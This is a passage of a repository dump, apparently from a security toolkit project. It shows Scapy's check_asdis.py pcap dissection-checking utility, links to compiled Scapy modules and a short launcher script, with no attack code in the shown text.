https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/route6.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/scapypipes.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/scapypipes.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/sendrecv.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/sendrecv.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/supersocket.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/supersocket.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/themes.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/themes.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/tools/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | """ 7 | Additional tools to be run separately 8 | """ 9 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/tools/check_asdis.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | import getopt 4 | 5 | def usage(): 6 | print >>sys.stderr,"""Usage: check_asdis -i [-o ] 7 | -v increase verbosity 8 | -d hexdiff packets that differ 9 | -z compress output pcap 10 | -a open pcap file in append mode""" 11 | 12 | def main(argv): 13 | PCAP_IN = None 14 | PCAP_OUT = None 15 | COMPRESS=False 16 | APPEND=False 17 | DIFF=False 18 | VERBOSE=0 19 | try: 20 | opts=getopt.getopt(argv, "hi:o:azdv") 21 | for opt, parm in opts[0]: 22 | if opt == "-h": 23 | usage() 24 | raise SystemExit 25 | elif opt == "-i": 26 | PCAP_IN = parm 27 | elif opt == "-o": 28 | PCAP_OUT = parm 29 | elif opt == "-v": 30 | VERBOSE += 1 31 | elif opt == "-d": 32 | DIFF = True 33 | elif opt == "-a": 34 | APPEND = True 35 | elif opt == "-z": 36 | COMPRESS = True 37 | 38 | 39 | if PCAP_IN is None: 40 | raise getopt.GetoptError("Missing pcap file (-i)") 41 | 42 | except getopt.GetoptError,e: 43 | print >>sys.stderr,"ERROR: %s" % e 44 | raise SystemExit 45 | 46 | 47 | 48 | from scapy.config import conf 49 | from scapy.utils import RawPcapReader,RawPcapWriter,hexdiff 50 | from scapy.layers import all 51 | 52 | 53 | pcap = RawPcapReader(PCAP_IN) 54 | pcap_out = None 55 | if PCAP_OUT: 56 | pcap_out = RawPcapWriter(PCAP_OUT, append=APPEND, gz=COMPRESS, linktype=pcap.linktype) 57 | pcap_out._write_header(None) 58 | 59 | LLcls = conf.l2types.get(pcap.linktype) 60 | if LLcls is None: 61 | print >>sys.stderr," Unknown link type [%i]. Can't test anything!" % pcap.linktype 62 | raise SystemExit 63 | 64 | 65 | i=-1 66 | differ=0 67 | failed=0 68 | for p1,meta in pcap: 69 | i += 1 70 | try: 71 | p2d = LLcls(p1) 72 | p2 = str(p2d) 73 | except KeyboardInterrupt: 74 | raise 75 | except Exception,e: 76 | print "Dissection error on packet %i" % i 77 | failed += 1 78 | else: 79 | if p1 == p2: 80 | if VERBOSE >= 2: 81 | print "Packet %i ok" % i 82 | continue 83 | else: 84 | print "Packet %i differs" % i 85 | differ += 1 86 | if VERBOSE >= 1: 87 | print repr(p2d) 88 | if DIFF: 89 | hexdiff(p1,p2) 90 | if pcap_out is not None: 91 | pcap_out.write(p1) 92 | i+=1 93 | correct = i-differ-failed 94 | print "%i total packets. %i ok, %i differed, %i failed. %.2f%% correct." % (i, correct, differ, 95 | failed, i and 100.0*(correct)/i) 96 | 97 | 98 | if __name__ == "__main__": 99 | import sys 100 | try: 101 | main(sys.argv[1:]) 102 | except KeyboardInterrupt: 103 | print >>sys.stderr,"Interrupted by user." 104 | -------------------------------------------------------------------------------- /smod/System/Lib/scapy/utils.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/utils.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/utils6.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/utils6.pyc -------------------------------------------------------------------------------- /smod/System/Lib/scapy/volatile.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/Lib/scapy/volatile.pyc -------------------------------------------------------------------------------- /smod/System/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/__init__.py -------------------------------------------------------------------------------- /smod/System/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xl7dev/ICSecurity/45693d87b4cc2818d0ddf4a3e8d110eb41ffeec1/smod/System/__init__.pyc -------------------------------------------------------------------------------- /smod/smod.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | 4 | sys.path.append(os.path.abspath(os.path.dirname(__file__) + '/System')) 5 | from System.Core import Interface 6 | 7 | Interface.init() 8 | Interface.mainLoop() 9 | --------------------------------------------------------------------------------